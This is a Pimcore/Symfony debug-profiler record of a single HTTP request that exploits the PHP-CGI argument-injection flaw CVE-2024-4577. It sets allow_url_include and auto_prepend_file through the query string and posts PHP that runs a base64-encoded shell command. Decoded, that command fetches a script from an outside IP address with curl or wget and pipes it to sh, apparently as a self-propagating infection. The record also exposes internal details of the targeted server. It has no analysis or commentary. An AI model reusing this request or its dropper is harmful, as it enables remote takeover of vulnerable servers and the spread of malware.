n/a
Request
GET Parameters
Key | Value |
---|---|
�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
Key | Value |
---|---|
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_editmode | false |
_pimcore_context | "default" |
_pimcore_frontend_request | true |
_remove_csp_headers | true |
_stopwatch_token | "38c110" |
Request Headers
Header | Value |
---|---|
accept | "*/*" |
authorization | "" |
connection | "keep-alive" |
content-length | "225" |
content-type | "application/x-www-form-urlencoded" |
host | "185.88.212.121:443" |
upgrade-insecure-requests | "1" |
user-agent | "Custom-AsyncHttpClient" |
x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
Header | Value |
---|---|
cache-control | "private, must-revalidate" |
content-language | "en" |
content-type | "text/html; charset=UTF-8" |
date | "Sat, 21 Sep 2024 17:02:41 GMT" |
expires | "Tue, 01 Jan 1980 00:00:00 GMT" |
pragma | "no-cache" |
vary | "Accept" |
x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2F185.88.212.121%2Fhello.world%22" |
x-debug-exception-file | "%2Fvar%2Fwww%2Fshare%2Fpimcore.c-776.maxcluster.net%2Fpimcore%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
x-debug-token | "a48f1c" |
x-debug-token-link | "https://185.88.212.121/_profiler/c226f3" |
x-powered-by | "pimcore" |
x-previous-debug-token | "c226f3" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_DEBUG | "1" |
APP_ENV | "dev" |
PIMCORE_DEV_MODE | "false" |
Defined as regular env variables
Key | Value |
---|---|
CONTENT_LENGTH | "225" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
CONTEXT_DOCUMENT_ROOT | "/var/www/share/pimcore.c-776.maxcluster.net/htdocs" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/www/share/pimcore.c-776.maxcluster.net/htdocs" |
FCGI_ROLE | "RESPONDER" |
GATEWAY_INTERFACE | "CGI/1.1" |
HOME | "/var/www/share" |
HTTPS | "on" |
HTTP_ACCEPT | "*/*" |
HTTP_AUTHORIZATION | "" |
HTTP_CONNECTION | "keep-alive" |
HTTP_HOST | "185.88.212.121:443" |
HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_HTTPS | "on" |
REDIRECT_HTTP_AUTHORIZATION | "" |
REDIRECT_QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_SCRIPT_URI | "https://185.88.212.121/hello.world" |
REDIRECT_SCRIPT_URL | "/hello.world" |
REDIRECT_STATIC_PAGE_URI | "/%home" |
REDIRECT_STATUS | "200" |
REDIRECT_UNIQUE_ID | "Zu78MUv3Qd-eSQ1V1eHr0QAAAMw" |
REDIRECT_URL | "/hello.world" |
REMOTE_ADDR | "46.38.143.33" |
REMOTE_PORT | "59978" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "https" |
REQUEST_TIME | 1726938161 |
REQUEST_TIME_FLOAT | 1726938161.7552 |
REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
SCRIPT_FILENAME | "/var/www/share/pimcore.c-776.maxcluster.net/htdocs/index.php" |
SCRIPT_NAME | "/index.php" |
SCRIPT_URI | "https://185.88.212.121/hello.world" |
SCRIPT_URL | "/hello.world" |
SERVER_ADDR | "185.88.212.121" |
SERVER_ADMIN | "root@localhost" |
SERVER_NAME | "185.88.212.121" |
SERVER_PORT | "443" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "" |
SERVER_SOFTWARE | "Apache" |
SSL_CIPHER | "TLS_AES_256_GCM_SHA384" |
SSL_CIPHER_ALGKEYSIZE | "256" |
SSL_CIPHER_EXPORT | "false" |
SSL_CIPHER_USEKEYSIZE | "256" |
SSL_CLIENT_VERIFY | "NONE" |
SSL_COMPRESS_METHOD | "NULL" |
SSL_PROTOCOL | "TLSv1.3" |
SSL_SECURE_RENEG | "false" |
SSL_SERVER_A_KEY | "id-ecPublicKey" |
SSL_SERVER_A_SIG | "ecdsa-with-SHA384" |
SSL_SERVER_I_DN | "CN=E5,O=Let's Encrypt,C=US" |
SSL_SERVER_I_DN_C | "US" |
SSL_SERVER_I_DN_CN | "E5" |
SSL_SERVER_I_DN_O | "Let's Encrypt" |
SSL_SERVER_M_SERIAL | "0323351598F826B7939C49F8C60F0B6BF126" |
SSL_SERVER_M_VERSION | "3" |
SSL_SERVER_SAN_DNS_0 | "pimcore.c-776.maxcluster.net" |
SSL_SERVER_S_DN | "CN=pimcore.c-776.maxcluster.net" |
SSL_SERVER_S_DN_CN | "pimcore.c-776.maxcluster.net" |
SSL_SERVER_V_END | "Dec 18 05:55:41 2024 GMT" |
SSL_SERVER_V_START | "Sep 19 05:55:42 2024 GMT" |
SSL_SESSION_ID | "27d3f43a79b7ea9866d7aca9decee6e441644e11a377dea1cb41c0ba11dcda8a" |
SSL_SESSION_RESUMED | "Initial" |
SSL_VERSION_INTERFACE | "mod_ssl/2.4.52" |
SSL_VERSION_LIBRARY | "OpenSSL/3.0.2" |
STATIC_PAGE_URI | "/%home" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_DEBUG,PIMCORE_DEV_MODE" |
UNIQUE_ID | "Zu78MUv3Qd-eSQ1V1eHr0QAAAMw" |
USER | "web-user" |
proxy-nokeepalive | "1" |